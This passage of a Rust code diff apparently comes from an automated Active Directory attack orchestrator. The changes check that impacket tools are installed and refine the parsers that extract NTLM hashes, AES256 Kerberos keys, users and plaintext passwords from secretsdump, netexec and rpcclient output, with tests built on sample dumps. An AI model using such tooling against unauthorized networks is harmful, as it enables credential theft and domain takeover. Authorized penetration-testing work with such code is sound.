     ("privesc", &["impacket-findDelegation", "impacket-getST"]),
     (
-        "lateral",
+        "lateral_movement",
         &[
             "impacket-psexec",
             "impacket-smbexec",
@@ -353,38 +367,67 @@ pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[
     ),
 ];
 
-/// Query Redis for each worker's tool inventory and report any missing
-/// critical tools. Returns a list of (role, missing_tools) pairs.
+/// Check if a binary is available on the local PATH.
+async fn is_in_path(binary: &str) -> bool {
+    tokio::process::Command::new("which")
+        .arg(binary)
+        .stdout(std::process::Stdio::null())
+        .stderr(std::process::Stdio::null())
+        .status()
+        .await
+        .is_ok_and(|s| s.success())
+}
+
+/// Report any missing critical tools per role.
+///
+/// In local-dispatch mode (`ARES_TOOL_DISPATCH=local`) there are no separate
+/// worker processes publishing inventory to Redis, so we probe the local
+/// PATH directly. In remote mode we read each worker's published inventory
+/// from `ares:tools:ares-{role}-agent`.
 pub(crate) async fn preflight_tool_check(
     conn: &mut redis::aio::ConnectionManager,
 ) -> Vec<(String, Vec<String>)> {
     use redis::AsyncCommands;
 
+    let local_dispatch = std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local");
     let mut problems = Vec::new();
 
     for &(role, critical) in CRITICAL_TOOLS {
-        let agent_key = format!("ares:tools:ares-{role}-agent");
-        let available: Vec<String> = match conn.get::<_, Option<String>>(&agent_key).await {
-            Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(),
-            _ => {
-                // No inventory published yet — worker may not have started
-                warn!(
-                    role = role,
-                    "No tool inventory found — worker may not be running"
-                );
-                problems.push((
-                    role.to_string(),
-                    critical.iter().map(|s| s.to_string()).collect(),
-                ));
-                continue;
+        let missing: Vec<String> = if local_dispatch {
+            let mut out = Vec::new();
+            for &tool in critical {
+                if !is_in_path(tool).await {
+                    out.push(tool.to_string());
+                }
             }
-        };
+            out
+        } else {
+            // Worker publishes inventory under hyphenated agent name
+            // (see ares-cli/src/worker/config.rs: agent_name = format!("ares-{}-agent", role.replace('_', "-"))).
+            // Mirror that here so role names with underscores resolve correctly.
+            let agent_key = format!("ares:tools:ares-{}-agent", role.replace('_', "-"));
+            let available: Vec<String> = match conn.get::<_, Option<String>>(&agent_key).await {
+                Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(),
+                _ => {
+                    // No inventory published yet — worker may not have started
+                    warn!(
+                        role = role,
+                        "No tool inventory found — worker may not be running"
+                    );
+                    problems.push((
+                        role.to_string(),
+                        critical.iter().map(|s| s.to_string()).collect(),
+                    ));
+                    continue;
+                }
+            };
 
-        let missing: Vec<String> = critical
-            .iter()
-            .filter(|&&tool| !available.iter().any(|a| a == tool))
-            .map(|s| s.to_string())
-            .collect();
+            critical
+                .iter()
+                .filter(|&&tool| !available.iter().any(|a| a == tool))
+                .map(|s| s.to_string())
+                .collect()
+        };
 
         if !missing.is_empty() {
             problems.push((role.to_string(), missing));
@@ -545,7 +588,7 @@ mod tests {
 
     #[test]
     fn critical_tools_have_valid_roles() {
-        let known_roles = ["recon", "credential_access", "privesc", "lateral"];
+        let known_roles = ["recon", "credential_access", "privesc", "lateral_movement"];
         for &(role, tools) in CRITICAL_TOOLS {
             assert!(
                 known_roles.contains(&role),
@@ -568,6 +611,14 @@ mod tests {
         }
     }
 
+    #[tokio::test]
+    async fn is_in_path_finds_which_itself() {
+        // `which` is on PATH on every dev box and CI; a nonsense binary is not.
+        // Used by the local-dispatch branch of preflight_tool_check.
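+        // Sketch of the expectation: `which which` exits 0, so the probe
+        // returns true; probing a made-up binary name exits non-zero, and
+        // is_ok_and(|s| s.success()) yields false.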
+        assert!(is_in_path("which").await);
+        assert!(!is_in_path("nonexistent_binary_for_preflight_xyz_123").await);
+    }
+
     #[test]
     fn critical_tools_secretsdump_in_cred_and_lateral() {
         // secretsdump is critical for both credential_access and lateral
             .unwrap_or(false);
         let has_lateral = CRITICAL_TOOLS
             .iter()
-            .find(|&&(r, _)| r == "lateral")
+            .find(|&&(r, _)| r == "lateral_movement")
             .map(|&(_, tools)| tools.contains(&"impacket-secretsdump"))
             .unwrap_or(false);
         assert!(has_cred);
diff --git a/ares-cli/src/orchestrator/output_extraction/hashes.rs b/ares-cli/src/orchestrator/output_extraction/hashes.rs
index 2979d432..a8fc5937 100644
--- a/ares-cli/src/orchestrator/output_extraction/hashes.rs
+++ b/ares-cli/src/orchestrator/output_extraction/hashes.rs
@@ -29,10 +29,73 @@ static RE_NTLM_PARTIAL: LazyLock<Regex> =
 static RE_NTLM_CONTINUATION: LazyLock<Regex> =
     LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap());

+// AES256 trust/account key from secretsdump:
+//   DOMAIN\\user:aes256-cts-hmac-sha1-96:
+//   domain.local/user:aes256-cts-hmac-sha1-96:
+//   user:aes256-cts-hmac-sha1-96:
+static RE_AES256_KEY: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(r"(?:[^\\/\s:]+[\\/])?([^:\s\\/]+):aes256-cts-hmac-sha1-96:([a-fA-F0-9]+)").unwrap()
+});
+
+// $MACHINE.ACC markers reveal the dump's source domain (NetBIOS prefix):
+//   CHILD\DC01$:aes256-cts-hmac-sha1-96:
+//   CHILD\DC01$:plain_password_hex:
+//   CHILD\DC01$:aad3...::::
+// The captured prefix authoritatively identifies the dump's actual domain,
+// which may differ from the task's params.domain (e.g. a cross-forest task
+// targeting fabrikam.local that ended up dumping a child DC).
+static RE_MACHINE_ACCT_DOMAIN: LazyLock<Regex> = LazyLock::new(|| {
+    Regex::new(
+        r"(?m)^([A-Za-z0-9_-]+)\\[A-Za-z0-9_.-]+\$:(?:aes256-cts-hmac-sha1-96|aes128-cts-hmac-sha1-96|plain_password_hex|des-cbc-md5|aad3b435b51404eeaad3b435b51404ee:[a-fA-F0-9]{32}:::)",
+    )
+    .unwrap()
+});
+
 pub fn extract_hashes(output: &str, default_domain: &str) -> Vec<Hash> {
     let mut hashes = Vec::new();
     let mut seen = std::collections::HashSet::new();

+    // Pre-scan for AES256 keys; these are emitted on separate lines from the
+    // NTLM hash by impacket-secretsdump. Win2016+ DCs reject RC4-only
+    // inter-realm tickets (KDC_ERR_TGT_REVOKED), so we attach the AES256 key
+    // to the matching Hash entry by username.
+    let mut aes_by_user: std::collections::HashMap<String, String> =
+        std::collections::HashMap::new();
+    for caps in RE_AES256_KEY.captures_iter(output) {
+        let user = caps.get(1).unwrap().as_str().to_lowercase();
+        let aes = caps.get(2).unwrap().as_str().to_lowercase();
+        aes_by_user.insert(user, aes);
+    }
+
+    // Detect the dump's actual NetBIOS domain from $MACHINE.ACC markers.
+    // If found and it conflicts with default_domain (the task's params.domain),
+    // we suppress plain-format NTLM lines to prevent phantom mislabels — the
+    // discoveries blob from the tool's own parser will have already captured
+    // these hashes with the correct domain.
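The pre-scan pairs each AES key with its user before the NTLM passes run. As a standalone sketch, assuming only the `regex` crate and omitting the `Hash` plumbing:

```rust
use std::collections::HashMap;
use regex::Regex;

/// Build a username -> AES256 key map from secretsdump output (sketch).
fn aes_keys_by_user(output: &str) -> HashMap<String, String> {
    // Same shape as RE_AES256_KEY above: optional DOMAIN\ or domain/ prefix,
    // then user:aes256-cts-hmac-sha1-96:<hex>.
    let re = Regex::new(
        r"(?:[^\\/\s:]+[\\/])?([^:\s\\/]+):aes256-cts-hmac-sha1-96:([a-fA-F0-9]+)",
    )
    .unwrap();
    let mut map = HashMap::new();
    for caps in re.captures_iter(output) {
        // Lowercase both sides so the later NTLM pass can join on username.
        map.insert(caps[1].to_lowercase(), caps[2].to_lowercase());
    }
    map
}
```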
+ let default_netbios = default_domain + .split('.') + .next() + .unwrap_or("") + .to_lowercase(); + let mut detected_netbios: Option = None; + let mut detected_ambiguous = false; + for caps in RE_MACHINE_ACCT_DOMAIN.captures_iter(output) { + let nb = caps.get(1).unwrap().as_str().to_lowercase(); + match detected_netbios { + None => detected_netbios = Some(nb), + Some(ref existing) if *existing == nb => {} + Some(_) => { + detected_ambiguous = true; + break; + } + } + } + let suppress_plain_ntlm = !detected_ambiguous + && !default_netbios.is_empty() + && detected_netbios + .as_deref() + .is_some_and(|nb| nb != default_netbios); + // First pass: unwrap line-wrapped NTLM hashes let lines: Vec<&str> = output.lines().collect(); let mut unwrapped: Vec = Vec::new(); @@ -72,7 +135,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -100,7 +163,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -126,7 +189,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -134,6 +197,13 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { // NTLM without domain prefix if let Some(caps) = RE_NTLM_PLAIN.captures(line) { + // Skip plain NTLM lines when the dump came from a domain that + // differs from default_domain — applying default_domain would + // create phantom entries (e.g. fabrikam.local:krbtgt mislabel of + // a child DC dump done under a cross-forest task). + if suppress_plain_ntlm { + continue; + } let username = caps.get(1).unwrap().as_str(); let lm = caps.get(3).unwrap().as_str(); let nt = caps.get(4).unwrap().as_str(); @@ -155,7 +225,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } } @@ -362,6 +432,82 @@ mod tests { assert!(extract_hashes("", "CONTOSO").is_empty()); } + #[test] + fn extract_hashes_suppresses_plain_ntlm_on_domain_mismatch() { + // Regression test for Bug F: a cross-forest task with default_domain=fabrikam.local + // dumped a CHILD DC (dc01). The output's $MACHINE.ACC marker + // (CHILD\DC01$:aes256-...) reveals the real domain is CHILD, so plain + // NTLM lines (krbtgt:502:..., Administrator:500:...) must NOT be labeled fabrikam.local. + let output = "\ +Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e993405ab82e4454afc9c9bb0939a25::: +[*] $MACHINE.ACC +CHILD\\DC01$:aes256-cts-hmac-sha1-96:583938786f0a9459ced10e35f5803be6d4017c6fd4ba21b6e7479f9bce851d6b +CHILD\\DC01$:aad3b435b51404eeaad3b435b51404ee:a3f11b5a18f97db9a3d4f16aed85a1b6::: +krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8c6d94541dbc90f085e86828428d2cbf::: +krbtgt:aes256-cts-hmac-sha1-96:86eebe21a5af32061e42ef050c447d4467648e54884a92d91a3f97fbfa0114a4"; + let hashes = extract_hashes(output, "fabrikam.local"); + // Plain NTLM lines must be suppressed — no hashes should carry the + // mismatched fabrikam.local label. 
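The decision this test pins down reduces to a pure predicate. A sketch, where `detected` is the NetBIOS prefix recovered from the `$MACHINE.ACC` lines and `ambiguous` flags conflicting prefixes; the function name is hypothetical:

```rust
fn should_suppress_plain_ntlm(
    detected: Option<&str>,
    ambiguous: bool,
    default_domain: &str,
) -> bool {
    // Compare only the first label of the task's domain, lowercased,
    // against the detected NetBIOS prefix.
    let default_netbios = default_domain
        .split('.')
        .next()
        .unwrap_or("")
        .to_lowercase();
    !ambiguous
        && !default_netbios.is_empty()
        && detected.is_some_and(|nb| nb.to_lowercase() != default_netbios)
}

// should_suppress_plain_ntlm(Some("CHILD"), false, "fabrikam.local")      == true
// should_suppress_plain_ntlm(Some("CHILD"), false, "child.contoso.local") == false
// should_suppress_plain_ntlm(None,          false, "contoso.local")       == false
```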
+ let labeled_fabrikam: Vec<_> = hashes + .iter() + .filter(|h| h.domain.eq_ignore_ascii_case("fabrikam.local")) + .collect(); + assert!( + labeled_fabrikam.is_empty(), + "no hashes should be labeled fabrikam.local when dump is from CHILD" + ); + // The phantom mislabel was specifically of krbtgt and Administrator — + // make sure neither slipped through with the wrong domain. + assert!( + !hashes.iter().any(|h| h.username == "krbtgt"), + "plain-format krbtgt must be suppressed on domain mismatch" + ); + assert!( + !hashes + .iter() + .any(|h| h.username.eq_ignore_ascii_case("Administrator")), + "plain-format Administrator must be suppressed on domain mismatch" + ); + } + + #[test] + fn extract_hashes_keeps_plain_ntlm_when_domain_matches() { + // When default_domain matches the detected NetBIOS prefix, plain NTLM + // lines are still extracted (the common case: a domain-targeted task). + let output = "\ +Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e993405ab82e4454afc9c9bb0939a25::: +CHILD\\DC01$:aes256-cts-hmac-sha1-96:5839387800000000000000000000000000000000000000000000000000000000 +krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8c6d94541dbc90f085e86828428d2cbf:::"; + let hashes = extract_hashes(output, "child.contoso.local"); + assert!(hashes.iter().any(|h| h.username == "krbtgt")); + assert!(hashes.iter().any(|h| h.username == "Administrator")); + } + + #[test] + fn extract_hashes_keeps_plain_ntlm_when_no_machine_acct_marker() { + // When the output has no $MACHINE.ACC marker, fall back to default_domain + // (we have no signal to override). This preserves the existing behavior + // for partial outputs and non-secretsdump tools. + let output = "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].domain, "contoso.local"); + } + + #[test] + fn extract_hashes_attaches_aes256_to_trust_account() { + let output = "\ +FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333::: +FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444"; + let hashes = extract_hashes(output, "fabrikam.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "CONTOSO$"); + assert_eq!( + hashes[0].aes_key.as_deref(), + Some("4444444444444444444444444444444444444444444444444444444444444444") + ); + } + #[test] fn extract_cracked_passwords_hashcat_tgs() { let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$aabb$ccdd:Summer2024!"; diff --git a/ares-cli/src/orchestrator/output_extraction/hosts.rs b/ares-cli/src/orchestrator/output_extraction/hosts.rs index f61053dc..f20fd7b6 100644 --- a/ares-cli/src/orchestrator/output_extraction/hosts.rs +++ b/ares-cli/src/orchestrator/output_extraction/hosts.rs @@ -56,9 +56,23 @@ pub fn extract_hosts(output: &str) -> Vec { .map(|c| c.get(1).unwrap().as_str().trim().to_string()) .unwrap_or_default(); + // Synthesize FQDN as `.`, but reject workgroup-only + // hosts where impacket reports the machine's NetBIOS name as the + // first label of the "domain" field (e.g. + // `(name:WIN-X) (domain:WIN-X.GXM0.LOCAL)` from a non-domain-joined + // Windows box). Without this guard we synthesize + // `win-x.win-x.gxm0.local` and `publish_host` then extracts the + // junk suffix `win-x.gxm0.local` into `state.domains`. 
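The guard in the hunk that follows can be read as a standalone function. This sketch mirrors its logic; the name is hypothetical:

```rust
/// Pick the hostname to record from an SMB banner: refuse to synthesize
/// an FQDN when the reported "domain" is really the machine's own name
/// (a workgroup host), and keep the bare NetBIOS name instead.
fn synthesized_hostname(netbios_name: &str, domain: &str) -> String {
    if netbios_name.is_empty() || domain.is_empty() || netbios_name.contains('.') {
        return netbios_name.to_string();
    }
    let nb = netbios_name.to_lowercase();
    let dom = domain.to_lowercase();
    // Workgroup self-report: (name:WIN-X) (domain:WIN-X.GXM0.LOCAL)
    if dom == nb || dom.starts_with(&format!("{nb}.")) {
        netbios_name.to_string()
    } else {
        format!("{nb}.{dom}")
    }
}
```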
let hostname = if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') { - format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase()) + let nb = netbios_name.to_lowercase(); + let dom = domain.to_lowercase(); + let workgroup_self = dom == nb || dom.starts_with(&format!("{}.", nb)); + if workgroup_self { + netbios_name + } else { + format!("{nb}.{dom}") + } } else { netbios_name }; @@ -162,6 +176,20 @@ SMB 192.168.58.10 445 DC01 [*] Windows Server (name:DC01) (domain:contoso.l assert!(extract_hosts("").is_empty()); } + #[test] + fn extract_workgroup_self_domain_does_not_duplicate_netbios() { + // Workgroup-only Windows hosts often report their own NetBIOS name as + // the first label of the SMB "domain" field. We must NOT synthesize + // `win-x.win-x.gxm0.local`; use the bare NetBIOS name instead so the + // junk suffix never reaches `state.domains`. + let output = "SMB 192.168.58.30 445 WIN-E4G4GC587O4 [*] Windows Server 2003 \ + (name:WIN-E4G4GC587O4) (domain:WIN-E4G4GC587O4.GXM0.LOCAL) (signing:False)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "WIN-E4G4GC587O4"); + assert!(!hosts[0].hostname.contains('.')); + } + #[test] fn extract_multiple_hosts() { let output = "\ diff --git a/ares-cli/src/orchestrator/output_extraction/mod.rs b/ares-cli/src/orchestrator/output_extraction/mod.rs index 533af753..a583c97e 100644 --- a/ares-cli/src/orchestrator/output_extraction/mod.rs +++ b/ares-cli/src/orchestrator/output_extraction/mod.rs @@ -54,22 +54,70 @@ impl TextExtractions { } } +/// Tool-call context paired with stdout, used by `extract_from_output_text` +/// to gate noisy regexes on the invoking tool's arguments. +/// +/// `arguments` is best-effort: when None (e.g. legacy bare-string tool_outputs +/// payloads), extractors fall back to the untyped behavior they had before this +/// struct was introduced. +pub struct ToolOutputCtx<'a> { + pub arguments: Option<&'a serde_json::Value>, + pub output: &'a str, +} + +impl<'a> ToolOutputCtx<'a> { + /// Returns true when the invoking arguments indicate the tool was authenticated + /// with a hash rather than a plaintext password. Tools like nxc/netexec echo the + /// supplied secret back on success lines (`[+] DOMAIN\user:secret (Pwn3d!)`), + /// so a hash-auth invocation produces a hash where credential regexes expect a + /// password. Extractors must short-circuit `password` regexes for these calls. + pub(crate) fn is_hash_auth(&self) -> bool { + let Some(args) = self.arguments else { + return false; + }; + let Some(obj) = args.as_object() else { + return false; + }; + for (k, v) in obj { + let key = k.to_lowercase(); + // Common spellings across our tool wrappers (nxc, impacket-*, etc.) + let is_hash_key = matches!( + key.as_str(), + "hash" | "hashes" | "nthash" | "lmhash" | "ntlm_hash" | "nt_hash" | "lm_hash" + ); + if !is_hash_key { + continue; + } + let nonempty = match v { + serde_json::Value::String(s) => !s.trim().is_empty(), + serde_json::Value::Array(a) => !a.is_empty(), + serde_json::Value::Null => false, + _ => true, + }; + if nonempty { + return true; + } + } + false + } +} + /// Extract all discoverable entities from raw output text. /// /// Runs all extraction passes and returns the combined results. 
-pub fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { +pub fn extract_from_output_text(ctx: &ToolOutputCtx<'_>, default_domain: &str) -> TextExtractions { let mut result = TextExtractions::default(); - if output.is_empty() { + if ctx.output.is_empty() { return result; } - result.hosts = extract_hosts(output); - result.users = extract_users(output, default_domain); - result.credentials = extract_plaintext_passwords(output, default_domain); - result.shares = extract_shares(output); - result.hashes = extract_hashes(output, default_domain); + result.hosts = extract_hosts(ctx.output); + result.users = extract_users(ctx.output, default_domain); + result.credentials = extract_plaintext_passwords(ctx, default_domain); + result.shares = extract_shares(ctx.output); + result.hashes = extract_hashes(ctx.output, default_domain); - let cracked = extract_cracked_passwords(output, default_domain); + let cracked = extract_cracked_passwords(ctx.output, default_domain); result.credentials.extend(cracked); result @@ -244,7 +292,48 @@ mod unit_tests { #[test] fn extract_from_output_text_empty() { - let result = extract_from_output_text("", "contoso.local"); + let ctx = ToolOutputCtx { + arguments: None, + output: "", + }; + let result = extract_from_output_text(&ctx, "contoso.local"); assert!(result.is_empty()); } + + #[test] + fn is_hash_auth_detects_common_keys() { + let args = serde_json::json!({"hashes": "aad3:abcd"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(ctx.is_hash_auth()); + + let args = serde_json::json!({"nthash": "abcd"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(ctx.is_hash_auth()); + + let args = serde_json::json!({"hashes": ""}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(!ctx.is_hash_auth()); + + let args = serde_json::json!({"password": "P@ss"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output: "", + }; + assert!(!ctx.is_hash_auth()); + + let ctx = ToolOutputCtx { + arguments: None, + output: "", + }; + assert!(!ctx.is_hash_auth()); + } } diff --git a/ares-cli/src/orchestrator/output_extraction/passwords.rs b/ares-cli/src/orchestrator/output_extraction/passwords.rs index 2d06a50a..083d65b9 100644 --- a/ares-cli/src/orchestrator/output_extraction/passwords.rs +++ b/ares-cli/src/orchestrator/output_extraction/passwords.rs @@ -31,10 +31,82 @@ static RE_NETEXEC_SUCCESS: LazyLock = LazyLock::new(|| { Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap() }); -pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec { +/// Regex for rpcclient `queryuser` output: `User Name :\tjdoe` +static RE_RPC_USER_NAME: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^\s*User\s+Name\s*:\s*(\S+)").unwrap()); + +/// Extract credentials from rpcclient queryuser blocks where "User Name" and +/// "Description" (containing a password) appear on separate lines. +/// +/// This is safe because rpcclient queryuser output is deterministic: attributes +/// always belong to the same user within a single query response block. 
+fn extract_rpcclient_description_passwords( + output: &str, + default_domain: &str, + seen: &mut std::collections::HashSet, +) -> Vec { + let mut credentials = Vec::new(); + let mut current_user: Option = None; + + for line in output.lines() { + let stripped = line.trim(); + // Track the current user from "User Name : xxx" + if let Some(caps) = RE_RPC_USER_NAME.captures(stripped) { + current_user = Some(caps.get(1).unwrap().as_str().to_string()); + continue; + } + // Empty line or new block separator resets user context + if stripped.is_empty() { + current_user = None; + continue; + } + // Look for password in Description field + if let Some(ref username) = current_user { + if stripped.to_lowercase().contains("description") + && stripped.to_lowercase().contains("password") + { + if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) { + let password = caps + .get(1) + .unwrap() + .as_str() + .trim_end_matches(|c: char| ".,;:()".contains(c)) + .trim_matches('\'') + .trim_matches('"') + .to_string(); + if is_valid_credential(username, &password) { + let key = format!("{}\\{}:{}", default_domain, username, password); + if seen.insert(key) { + credentials.push(make_credential( + username, + &password, + default_domain, + "description_field", + )); + } + } + } + } + } + } + credentials +} + +pub fn extract_plaintext_passwords( + ctx: &super::ToolOutputCtx<'_>, + default_domain: &str, +) -> Vec { + let output = ctx.output; let mut credentials = Vec::new(); let mut seen = std::collections::HashSet::new(); + // First pass: extract from rpcclient queryuser blocks (multi-line) + credentials.extend(extract_rpcclient_description_passwords( + output, + default_domain, + &mut seen, + )); + const FAILURE_MARKERS: &[&str] = &[ "STATUS_LOGON_FAILURE", "STATUS_PASSWORD_EXPIRED", @@ -54,29 +126,38 @@ pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec Vec Vec { + let ctx = ToolOutputCtx { + arguments: None, + output, + }; + super::passwords::extract_plaintext_passwords(&ctx, default_domain) +} + +fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { + let ctx = ToolOutputCtx { + arguments: None, + output, + }; + super::extract_from_output_text(&ctx, default_domain) +} + #[test] fn extract_ntlm_with_domain() { let output = @@ -349,6 +367,36 @@ SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe"; assert_eq!(result.credentials[0].source, "netexec_auth"); } +#[test] +fn extract_netexec_skips_hash_auth_echo() { + let output = + "SMB 192.168.58.11 445 DC01 [+] contoso.local\\frank:6dccf1c567c56a40e56691a723a49664 (Pwn3d!)"; + let args = serde_json::json!({"hashes": "6dccf1c567c56a40e56691a723a49664"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output, + }; + let result = super::extract_from_output_text(&ctx, "contoso.local"); + assert!( + result.credentials.is_empty(), + "hash echo must not become a credential: {:?}", + result.credentials + ); +} + +#[test] +fn extract_netexec_password_auth_still_extracted() { + let output = "SMB 192.168.58.11 445 DC01 [+] contoso.local\\jdoe:RealPass1 (Pwn3d!)"; + let args = serde_json::json!({"password": "RealPass1"}); + let ctx = ToolOutputCtx { + arguments: Some(&args), + output, + }; + let result = super::extract_from_output_text(&ctx, "contoso.local"); + assert_eq!(result.credentials.len(), 1); + assert_eq!(result.credentials[0].password, "RealPass1"); +} + #[test] fn extract_netexec_success_with_pwned() { let output = "SMB 192.168.58.11 445 DC01 [+] 
contoso.local\\Administrator:P@ssw0rd(Pwn3d!)"; @@ -494,12 +542,12 @@ fn extract_cracked_tgs_john_show_unknown_user() { let output = "Loaded 1 password hash (krb5tgs)\n\ $krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456\n\ --- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let creds = extract_cracked_passwords(output, "child.contoso.local"); assert_eq!(creds.len(), 1); assert_eq!(creds[0].username, "john.smith"); - assert_eq!(creds[0].password, "iknownothing"); + assert_eq!(creds[0].password, "P@ssw0rd!"); assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); assert_eq!(creds[0].source, "cracked:john"); } @@ -508,7 +556,7 @@ fn extract_cracked_tgs_john_show_unknown_user() { fn extract_cracked_tgs_john_unknown_user_no_hash_context() { // Without a TGS hash line in the output, ?:password is skipped let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let creds = extract_cracked_passwords(output, "contoso.local"); assert!(creds.is_empty(), "No TGS hash context = no credential"); @@ -526,6 +574,51 @@ fn extract_cracked_no_false_positive_on_raw_asrep_hash() { ); } +/// rpcclient queryuser output puts User Name and Description on separate lines. +/// The block-aware parser should extract the password from the Description field. +#[test] +fn extract_rpcclient_queryuser_description_password() { + let output = "\ +\tUser Name :\tjdoe\n\ +\tFull Name :\t\n\ +\tHome Drive :\t\n\ +\tDir Drive :\t\n\ +\tProfile Path:\t\n\ +\tLogon Script:\t\n\ +\tDescription :\tJohn Doe (Password : Summer2024!)\n\ +\tWorkstations:\t\n\ +\tComment :\t\n\ +\tRemote Dial :\n"; + let creds = extract_plaintext_passwords(output, "child.contoso.local"); + assert_eq!( + creds.len(), + 1, + "Should extract credential from rpcclient queryuser block" + ); + assert_eq!(creds[0].username, "jdoe"); + assert_eq!(creds[0].password, "Summer2024!"); + assert_eq!(creds[0].domain, "child.contoso.local"); + assert_eq!(creds[0].source, "description_field"); +} + +/// Multiple rpcclient queryuser blocks — only users WITH passwords should produce creds. +#[test] +fn extract_rpcclient_queryuser_multiple_users() { + let output = "\ +\tUser Name :\tasmith\n\ +\tDescription :\tAlice Smith\n\ +\n\ +\tUser Name :\tjdoe\n\ +\tDescription :\tJohn Doe (Password : Summer2024!)\n\ +\n\ +\tUser Name :\tbjones\n\ +\tDescription :\tBob Jones\n"; + let creds = extract_plaintext_passwords(output, "child.contoso.local"); + assert_eq!(creds.len(), 1, "Only jdoe has a password in description"); + assert_eq!(creds[0].username, "jdoe"); + assert_eq!(creds[0].password, "Summer2024!"); +} + #[test] fn valid_credential_rejects_hash_body_password() { // Long hex+$ strings should be rejected as hash fragments diff --git a/ares-cli/src/orchestrator/output_extraction/users.rs b/ares-cli/src/orchestrator/output_extraction/users.rs index a1dec373..5c3d543a 100644 --- a/ares-cli/src/orchestrator/output_extraction/users.rs +++ b/ares-cli/src/orchestrator/output_extraction/users.rs @@ -26,6 +26,21 @@ static RE_SMB_TIMESTAMP: LazyLock = LazyLock::new(|| { Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() }); +/// Check if a domain string looks like a machine hostname rather than an AD domain. 
+/// +/// Machine FQDNs like `win-g7fpa5zzxzv.w5an.local` or NetBIOS machine names like +/// `WIN-G7FPA5ZZXZV` pollute domain tracking when they appear in SMB banners or +/// UPN suffixes (e.g., null session enum on a DC reports the Kali box's own domain). +pub fn is_machine_hostname_domain(domain: &str) -> bool { + let first_label = domain.split('.').next().unwrap_or(domain); + let lower = first_label.to_lowercase(); + // Windows auto-generated hostnames: WIN-XXXXXXXX, DESKTOP-XXXXXXX + if lower.starts_with("win-") || lower.starts_with("desktop-") { + return true; + } + false +} + /// Reject garbage usernames and invalid domains from regex extraction. pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool { if username.is_empty() || username.ends_with('$') { @@ -83,12 +98,17 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { let stripped = line.trim(); if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) { - current_domain = caps + let captured = caps .get(1) .unwrap() .as_str() .trim_end_matches('.') .to_string(); + // Don't let machine hostnames (e.g. from Kali's own SMB banner) + // override the task's default domain. + if !is_machine_hostname_domain(&captured) { + current_domain = captured; + } } let mut found = Vec::new(); @@ -102,7 +122,13 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { if let Some(caps) = RE_UPN.captures(stripped) { let user = caps.get(1).unwrap().as_str(); let dom = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); + // If UPN suffix is a machine hostname (e.g. user@win-xxx.w5an.local), + // substitute the default domain to avoid storing garbage domains. + if is_machine_hostname_domain(dom) { + found.push((user.to_string(), default_domain.to_string())); + } else { + found.push((user.to_string(), dom.to_string())); + } } for caps in RE_USER_BRACKET.captures_iter(stripped) { 